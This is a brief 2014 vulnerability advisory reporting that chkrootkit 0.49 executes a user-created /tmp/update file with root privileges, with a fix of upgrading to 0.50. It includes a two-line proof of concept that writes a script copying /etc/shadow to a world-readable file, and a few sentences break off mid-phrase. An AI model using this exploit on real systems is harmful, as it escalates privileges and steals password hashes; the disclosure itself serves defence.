Thu Jun 5 06:27:35 UTC 2014


As ironic as it sounds, chkrootkit 0.49 can be turned into a 

On systems where /tmp is not mounted noexec, a regular user can 
create a 
file /tmp/update which chkrootkit will execute with root privileges 
time it's run.

Here's a simple PoC...as normal user: 

$ echo -e '#!/bin/bash\ncat /etc/shadow > /tmp/stolen' > /tmp/update
$ chmod 755 /tmp/update

As root:

# chkrootkit

Now the user has access to the shadow password file (/tmp/stolen).

Solution: Update to chkrootkit 0.50


